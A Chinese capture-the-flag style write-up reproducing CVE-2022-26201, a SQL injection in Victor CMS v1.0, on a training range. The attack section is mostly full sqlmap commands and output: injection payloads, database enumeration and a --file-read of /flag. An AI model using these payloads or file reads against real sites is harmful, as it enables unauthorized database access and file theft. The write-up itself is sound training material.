前言

CVE-2022-26201 是 Victor CMS v1.0 中发现的一个 SQL 注入漏洞。该漏洞允许攻击者通过特制的 SQL 查询注入到应用程序中，从而访问或操作数据库中的数据。以下是详细信息：

1. 漏洞描述：

   • 类型：SQL 注入 (SQL Injection)
   • 影响版本：Victor CMS v1.0
   • 漏洞细节：该漏洞存在于 Victor CMS v1.0 的登录模块中，攻击者可以通过特制的输入字符串绕过身份验证或执行数据库中的任意 SQL 命令。

2. CVSS 评分：

   • CVSS v2：基本分数为 7.5，评估为高危 (High)。
   • CVSS v3：基本分数为 9.8，评估为严重 (Critical)。

3. 攻击向量：

   • 攻击复杂度：低 (Low)
   • 需要权限：无 (None)
   • 用户交互：不需要 (None)
   • 范围：不变 (Unchanged)
   • 机密性影响：高 (High)
   • 完整性影响：高 (High)
   • 可用性影响：高 (High)

4. 解决方案：

   • 建议用户及时更新到修补了该漏洞的版本。
   • 对输入进行严格的校验，避免直接使用用户输入的内容构造 SQL 查询。
   • 使用参数化查询 (Parameterized Queries) 或预编译语句 (Prepared Statements) 来防止 SQL 注入攻击。

春秋云镜靶场是一个专注于网络安全培训和实战演练的平台，旨在通过模拟真实的网络环境和攻击场景，提升用户的网络安全防护能力和实战技能。这个平台主要提供以下功能和特点：

实战演练：

提供各种网络安全攻防演练场景，模拟真实的网络攻击事件，帮助用户在实际操作中掌握网络安全技术。
场景涵盖Web安全、系统安全、网络安全、社工攻击等多个领域。
漏洞复现：

用户可以通过平台对已知的安全漏洞进行复现，了解漏洞的产生原因、利用方法和修复措施。
通过实战操作，帮助用户掌握漏洞利用和防护的技能。
教学培训：

提供系统化的网络安全课程，从基础到高级，覆盖多个安全领域，适合不同水平的用户。
包含理论讲解和实战操作，帮助学员全面提升网络安全知识和实战能力。
竞赛与评测：

定期举办网络安全竞赛，如CTF（Capture The Flag）比赛，激发学员的学习兴趣和动力。
提供个人和团队的安全能力评测，帮助学员了解自己的安全技能水平。
资源共享：

平台提供丰富的学习资源，包括教程、工具、案例分析等，方便用户随时查阅和学习。
用户可以在社区中分享经验和资源，互相交流和学习。

春秋云镜靶场适合网络安全从业人员、学生以及对网络安全感兴趣的个人，通过在平台上进行不断的学习和实战演练，可以有效提升网络安全技能和防护能力。

介绍

Victor CMS 是一个内容管理系统（CMS），其设计目的是提供一个易于使用的工具来帮助用户管理和发布网站内容。以下是 Victor CMS v1.0 的一些主要特性和功能：

特性和功能

1. 用户友好界面：

   • Victor CMS 提供直观的用户界面，简化了网站内容的管理和编辑过程，即使是没有技术背景的用户也能轻松上手。

2. 灵活的内容管理：

   • 用户可以轻松创建、编辑和发布各种类型的内容，包括文章、博客帖子、图片和视频等。

3. 模块化设计：

   • Victor CMS 具有模块化设计，用户可以根据需求扩展功能。例如，可以通过插件添加电子商务功能、论坛、评论系统等。

4. 模板系统：

   • Victor CMS 支持模板系统，用户可以通过模板自定义网站的外观和布局，适应不同的设计需求。

5. 多用户支持：

   • 系统支持多用户管理，不同的用户可以拥有不同的权限，方便团队协作管理网站内容。

6. SEO优化：

   • 内置SEO工具，帮助用户优化网站在搜索引擎中的排名，提高网站的可见性。

适用场景

• 个人博客：适合个人或小型团队使用，用于创建和管理个人博客或小型网站。
• 小型企业网站：适合小型企业用来建立企业展示网站，快速发布公司新闻和产品信息。
• 教育和非营利组织：可以用于教育机构和非营利组织创建信息门户或社区网站。

资源和支持

• Victor CMS 是开源项目，用户可以自由下载、使用和修改。活跃的社区支持提供了丰富的资源和插件，帮助用户定制和扩展功能。

漏洞复现

打开靶场

点击链接访问

SQL 注入嘛，就看传参测试呗，点击下面的一个 Read More

可以看到有 POST 传参

使用 SQLMap 测试看是否可注入 

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze1zg3di4cmdj0qmzyq.cloudeci1.ichunqiu.com/post.php?post=4"                                          
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.8.4#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:28:04 /2024-07-01/

[20:28:04] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=rcf9delnsjc...njvsj2eil9'). Do you want to use those [Y/n] n
[20:28:05] [INFO] checking if the target is protected by some kind of WAF/IPS
[20:28:05] [INFO] testing if the target URL content is stable
[20:28:05] [INFO] target URL content is stable
[20:28:05] [INFO] testing if GET parameter 'post' is dynamic
[20:28:06] [INFO] GET parameter 'post' appears to be dynamic
[20:28:06] [INFO] heuristic (basic) test shows that GET parameter 'post' might be injectable
[20:28:06] [INFO] testing for SQL injection on GET parameter 'post'
[20:28:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:28:06] [INFO] GET parameter 'post' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="by")
n
[20:28:08] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL' 
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[20:28:09] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[20:28:09] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:28:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[20:28:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:28:09] [INFO] testing 'Generic inline queries'
[20:28:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:28:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:28:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:28:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[20:28:29] [INFO] GET parameter 'post' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable 
[20:28:29] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:28:29] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:28:29] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[20:28:30] [INFO] target URL appears to have 10 columns in query
[20:28:30] [INFO] GET parameter 'post' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: post (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: post=4 AND 9507=9507

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: post=4 AND (SELECT 5389 FROM (SELECT(SLEEP(5)))LdWq)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: post=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627a71,0x744251516e6e704a7061617746456544677668734a546c486f65754c526c76546b4a6b556f5a4679,0x716a786271),NULL,NULL,NULL,NULL-- -
---
[20:28:35] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12
[20:28:35] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze1zg3di4cmdj0qmzyq.cloudeci1.ichunqiu.com'

[*] ending @ 20:28:35 /2024-07-01/

可注入，接下来就是爆库

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze1zg3di4cmdj0qmzyq.cloudeci1.ichunqiu.com/post.php?post=4" --dbs
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.8.4#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:31:43 /2024-07-01/

[20:31:43] [INFO] resuming back-end DBMS 'mysql' 
[20:31:43] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=qgj8g0dpu05...tjt5vg1nlq'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: post (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: post=4 AND 9507=9507

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: post=4 AND (SELECT 5389 FROM (SELECT(SLEEP(5)))LdWq)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: post=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627a71,0x744251516e6e704a7061617746456544677668734a546c486f65754c526c76546b4a6b556f5a4679,0x716a786271),NULL,NULL,NULL,NULL-- -
---
[20:31:45] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12
[20:31:45] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] php_cms
[*] sys

[20:31:45] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze1zg3di4cmdj0qmzyq.cloudeci1.ichunqiu.com'

[*] ending @ 20:31:45 /2024-07-01/

在 mysql 数据库中查找有关 flag 的文件

┌──(root㉿kali)-[~]
└─# sqlmap -u "http://eci-2ze1zg3di4cmdj0qmzyq.cloudeci1.ichunqiu.com/post.php?post=4" -D "mysql" --file-read "/flag"
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.8.4#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:34:51 /2024-07-01/

[20:34:51] [INFO] resuming back-end DBMS 'mysql' 
[20:34:51] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=7tvusuu94vg...njlni1t1m2'). Do you want to use those [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: post (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: post=4 AND 9507=9507

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: post=4 AND (SELECT 5389 FROM (SELECT(SLEEP(5)))LdWq)

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: post=4 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7171627a71,0x744251516e6e704a7061617746456544677668734a546c486f65754c526c76546b4a6b556f5a4679,0x716a786271),NULL,NULL,NULL,NULL-- -
---
[20:34:53] [INFO] the back-end DBMS is MySQL
web application technology: PHP
back-end DBMS: MySQL >= 5.0.12
[20:34:53] [INFO] fingerprinting the back-end DBMS operating system
[20:34:53] [INFO] the back-end DBMS operating system is Linux
[20:34:53] [INFO] fetching file: '/flag'
do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] n
files saved to [1]:
[*] /root/.local/share/sqlmap/output/eci-2ze1zg3di4cmdj0qmzyq.cloudeci1.ichunqiu.com/files/_flag

[20:34:55] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze1zg3di4cmdj0qmzyq.cloudeci1.ichunqiu.com'

[*] ending @ 20:34:55 /2024-07-01/

使用 cat 查看给出的文件地址

┌──(root㉿kali)-[~]
└─# cat /root/.local/share/sqlmap/output/eci-2ze1zg3di4cmdj0qmzyq.cloudeci1.ichunqiu.com/files/_flag
flag{110f85e5-3b61-4e5c-90f6-8ce50e7d9c6f}